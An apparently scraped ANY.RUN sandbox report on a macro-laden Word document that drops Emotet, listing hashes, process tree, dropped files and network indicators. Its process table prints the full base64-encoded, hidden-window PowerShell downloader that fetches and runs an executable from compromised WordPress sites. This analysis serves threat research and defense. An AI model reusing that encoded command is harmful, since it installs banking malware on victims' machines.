analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

b2b5056256b88716e279aaa30b50dbe4

Full analysis: https://app.any.run/tasks/17229500-b22b-4cf4-8120-8bfcf690ecbe
Verdict: Malicious activity
Threats:

Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims but even private users get infected in mass spam email campaigns.

Analysis date: May 20, 2019, 09:15:42
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
macros
macros-on-open
generated-doc
loader
emotet
emotet-doc
Indicators:
MIME: application/msword
File info: Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Title: Ways, Subject: Credit Card Account, Author: Sabryna Ondricka, Comments: Practical, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Mon May 20 07:20:00 2019, Last Saved Time/Date: Mon May 20 07:20:00 2019, Number of Pages: 1, Number of Words: 11, Number of Characters: 63, Security: 0
MD5:

B2B5056256B88716E279AAA30B50DBE4

SHA1:

F07AC191FA875F7F153600B0DABAFDD8D1FC9A31

SHA256:

FAF7082318955D662B2E456ED89481BB1EF089D039668646F86C4AC852B27353

SSDEEP:

3072:d77HUUUUUUUUUUUUUUUUUUUTkOQePu5U8qGaXX5ujlwxb:d77HUUUUUUUUUUUUUUUUUUUT52VJaXXH

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Downloads executable files from the Internet

      • powershell.exe (PID: 2788)
    • Application was dropped or rewritten from another process

      • 881.exe (PID: 3668)
      • soundser.exe (PID: 1908)
      • 881.exe (PID: 2276)
      • soundser.exe (PID: 1396)
    • Emotet process was detected

      • soundser.exe (PID: 1908)
  • SUSPICIOUS

    • Creates files in the user directory

      • powershell.exe (PID: 2788)
    • PowerShell script executed

      • powershell.exe (PID: 2788)
    • Executed via WMI

      • powershell.exe (PID: 2788)
    • Executable content was dropped or overwritten

      • powershell.exe (PID: 2788)
      • 881.exe (PID: 3668)
    • Application launched itself

      • soundser.exe (PID: 1908)
    • Starts itself from another location

      • 881.exe (PID: 3668)
    • Connects to server without host name

      • soundser.exe (PID: 1396)
  • INFO

    • Reads Microsoft Office registry keys

      • WINWORD.EXE (PID: 3336)
    • Creates files in the user directory

      • WINWORD.EXE (PID: 3336)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.doc | Microsoft Word document (54.2)
.doc | Microsoft Word document (old ver.) (32.2)

EXIF

FlashPix

CompObjUserTypeLen: 32
CompObjUserType: Microsoft Word 97-2003 Document
Title: Ways
Subject: Credit Card Account
Author: Sabryna Ondricka
Keywords: -
Comments: Practical
Template: Normal.dotm
LastModifiedBy: -
RevisionNumber: 1
Software: Microsoft Office Word
TotalEditTime: -
CreateDate: 2019:05:20 06:20:00
ModifyDate: 2019:05:20 06:20:00
Pages: 1
Words: 11
Characters: 63
Security: None
CodePage: Windows Latin 1 (Western European)
Company: Nolan - McLaughlin
Lines: 1
Paragraphs: 1
CharCountWithSpaces: 73
AppVersion: 16
ScaleCrop: No
LinksUpToDate: No
SharedDoc: No
HyperlinksChanged: No
TitleOfParts: -
HeadingPairs:
  • Title
  • 1
Manager: Ruecker
No data.
screenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
40
Monitored processes
6
Malicious processes
4
Suspicious processes
0

Behavior graph

Click at the process to see the details
start drop and start drop and start winword.exe no specs powershell.exe 881.exe no specs 881.exe #EMOTET soundser.exe no specs soundser.exe

Process information

PID
CMD
Path
Indicators
Parent process
3336"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\b2b5056256b88716e279aaa30b50dbe4.doc"C:\Program Files\Microsoft Office\Office14\WINWORD.EXEexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Version:
14.0.6024.1000
2788powershell -ExecutionPolicy bypass -WindowStyle Hidden -noprofile -e JABSAF8ANwA4ADMAMgAwAD0AJwBJADgAMwA0ADQAMAAnADsAJABHADIAMQAyAF8AMQAzADgAIAA9ACAAJwA4ADgAMQAnADsAJABDADAAMAA3ADMANgA0AD0AJwB1ADQAXwA4ADQAOQBfACcAOwAkAEUANwAyAF8ANAA0ADUAPQAkAGUAbgB2ADoAdQBzAGUAcgBwAHIAbwBmAGkAbABlACsAJwBcACcAKwAkAEcAMgAxADIAXwAxADMAOAArACcALgBlAHgAZQAnADsAJABZAF8AXwA5ADYANQAzADgAPQAnAHAAOAAzADIANwA5ADgANAAnADsAJABLADEAOAAyADgANgA9ACYAKAAnAG4AZQAnACsAJwB3ACcAKwAnAC0AbwBiAGoAZQBjAHQAJwApACAAbgBlAFQALgBgAHcAZQBCAGMAbABgAEkAYABlAE4AVAA7ACQAQQA3AF8AMgAyAF8AMQAyAD0AJwBoAHQAdABwADoALwAvAHQAZQBuAGEAbgB0AHMAYwByAGUAZQBuAGkAbgBnAGEAcwBpAGEALgBjAG8AbQAvAHcAcAAtAGEAZABtAGkAbgAvAHoAcABqAGQAdgB5ADEANwAvAEAAaAB0AHQAcAA6AC8ALwBiAHkAcwB0AGUAawBzAHQAaQBsAC4AYwBvAG0ALwB3AHAALQBhAGQAbQBpAG4ALwB6AG0ANgA0ADgAMQAvAEAAaAB0AHQAcAA6AC8ALwBlAHIAaQBjAC0AbQBhAG4AZABhAGwAYQAuAGMAbwBtAC8AdwBwAC0AYwBvAG4AdABlAG4AdAAvAGYAagA2ADgANwAyADQAOAAxADIALwBAAGgAdAB0AHAAOgAvAC8AYQB2AGkAdAByAG8AbgBzAC4AYwBvAG0ALwB1AG0AYQAtAHMAaQB0AGUALwBpAHMAaQAyAC8AQABoAHQAdABwADoALwAvAGQAZQB2AGUAbABvAHAAaQBuAGcALgBzAG8AdQBsAGIAcgBpAGcAaAB0AHMALgBjAG8AbQAvAHcAcAAvAHMANAA0ADUALwAnAC4AUwBQAEwASQBUACgAJwBAACcAKQA7ACQAawAyADQAOAA3AF8AOAAzAD0AJwBYADUANgAyADUANgA2ACcAOwBmAG8AcgBlAGEAYwBoACgAJABmADEANABfADAAMQBfADQAIABpAG4AIAAkAEEANwBfADIAMgBfADEAMgApAHsAdAByAHkAewAkAEsAMQA4ADIAOAA2AC4ARABvAFcAbgBMAE8AYQBEAGYASQBMAEUAKAAkAGYAMQA0AF8AMAAxAF8ANAAsACAAJABFADcAMgBfADQANAA1ACkAOwAkAFUANQA3ADUANQA5ADAAPQAnAFcAXwA4ADUANAAyACcAOwBJAGYAIAAoACgAJgAoACcARwBlACcAKwAnAHQALQAnACsAJwBJAHQAZQBtACcAKQAgACQARQA3ADIAXwA0ADQANQApAC4ATABlAG4AZwBUAEgAIAAtAGcAZQAgADMAOQA3ADMAMQApACAAewAuACgAJwBJACcAKwAnAG4AdgBvAGsAZQAtACcAKwAnAEkAdABlAG0AJwApACAAJABFADcAMgBfADQANAA1ADsAJABPADMANgA5AF8AMwA4AD0AJwBKADEAOAAxADMANQAxACcAOwBiAHIAZQBhAGsAOwAkAEYAOABfADAAOQA0AD0AJwBaADgAMQAyADUAMwAxAF8AJwB9AH0AYwBhAHQAYwBoAHsAfQB9ACQAcgA3ADUANQA5ADAAPQAnAGYANQA1ADgAMwA1ADIAOQAnAA==C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
wmiprvse.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
2276"C:\Users\admin\881.exe" C:\Users\admin\881.exepowershell.exe
User:
admin
Integrity Level:
MEDIUM
Exit code:
0
3668--5010ccafC:\Users\admin\881.exe
881.exe
User:
admin
Integrity Level:
MEDIUM
Exit code:
0
1908"C:\Users\admin\AppData\Local\soundser\soundser.exe"C:\Users\admin\AppData\Local\soundser\soundser.exe
881.exe
User:
admin
Integrity Level:
MEDIUM
Exit code:
0
1396--3ab57678C:\Users\admin\AppData\Local\soundser\soundser.exe
soundser.exe
User:
admin
Integrity Level:
MEDIUM
Total events
1 697
Read events
1 216
Write events
0
Delete events
0

Modification events

No data
Executable files
2
Suspicious files
2
Text files
0
Unknown types
7

Dropped files

PID
Process
Filename
Type
3336WINWORD.EXEC:\Users\admin\AppData\Local\Temp\CVRE915.tmp.cvr
MD5:
SHA256:
2788powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\RJSKKY18JP1KP9PTDRPD.temp
MD5:
SHA256:
3336WINWORD.EXEC:\Users\admin\AppData\Local\Temp\Word8.0\MSForms.exdtlb
MD5:72E11EAD35E85AC177BEF3D6634DB8E1
SHA256:972181AB99CEB3FBC177FE5A029799E1A45C0EBD3223FB568982028881744C13
3336WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\1627539B.wmfwmf
MD5:20C72B28E1BB5D6128D019E089AB7093
SHA256:11E68101376DE075E80104D17D093EE3A018CD4BC93AE2205E827D3D4FF5A6C0
2788powershell.exeC:\Users\admin\881.exeexecutable
MD5:C41D5F7ADE1A1EB9F9216B2B90EB53EA
SHA256:315B772F4CEE9CE22AE23A59A0ABB252675AEF655BA3E3D06A2F3B282D80768F
3336WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\83C04582.wmfwmf
MD5:BE821216F0F5D750EEDC2DD731AB8104
SHA256:4F42EDBCAF8BC035D903D35AE0B34A5BC4D6D23B8595B29C8AE5281E25117AB1
3336WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\D077B854.wmfwmf
MD5:A1759BDA71C3FE0B899A08B657C2643E
SHA256:13AD1498E24AE8D7E6FCE1B4FA1DD9855E865891B48CD56775EC3F351565A6C1
3336WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\49B9D445.wmfwmf
MD5:38FC8B55C54801674D396C8378EA3072
SHA256:7DB07B04A9BDF2CB6151C9BA124F18D95F6606D5B4DD9BCD85B9B488C8E0C52C
3336WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotmpgc
MD5:1DBF94C52019F3FA68C5F190CC8E718C
SHA256:D3BE336F578B31B1E3E6BD5ABD73B111AB652DB1A9E30959ED3E7F3480EC098E
2788powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-msbinary
MD5:131DC75F6D4142CA9244945A91A71E8D
SHA256:F17C463C77B5DA9E795770A82E0A7FB1023023F44397F6E080721E9811B2A0C4
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
2
TCP/UDP connections
2
DNS requests
5
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
1396
soundser.exe
POST
80.0.106.83:80
http://80.0.106.83/forced/tlb/
GB
malicious
2788
powershell.exe
GET
200
202.71.110.22:80
http://tenantscreeningasia.com/wp-admin/zpjdvy17/
MY
executable
73.0 Kb
suspicious
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
2788
powershell.exe
202.71.110.22:80
tenantscreeningasia.com
TM-VADS DC Hosting
MY
suspicious
1396
soundser.exe
80.0.106.83:80
Virgin Media Limited
GB
malicious

DNS requests

Domain
IP
Reputation
tenantscreeningasia.com
  • 202.71.110.22
suspicious

Threats

No threats detected
No debug info